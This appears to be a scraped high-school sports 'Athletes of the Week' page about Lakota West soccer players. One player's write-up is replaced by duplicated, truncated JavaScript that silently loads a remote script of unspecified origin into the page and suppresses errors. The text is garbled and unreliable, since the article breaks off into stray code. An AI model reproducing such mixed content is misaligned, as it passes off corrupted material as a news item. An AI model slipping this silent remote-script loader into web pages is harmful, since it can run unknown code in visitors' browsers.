Athletes of the Week
Kemba Credit Union Athletes of the Week 10/14/2019-10/20/2019
Vince Brown
Sophomore, Soccer
Vince opened the scoring in Lakota West’s tournament win over Western Hills with a three-goal hat trick. Brown’s first goal came on a free-kick just two minutes into the contest and he had all three goals in the book by the 16th minute. This led to a West 7-0 victory advancing them to the tournament round of 64.
Savannah Grubbs
Junior, Soccer
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();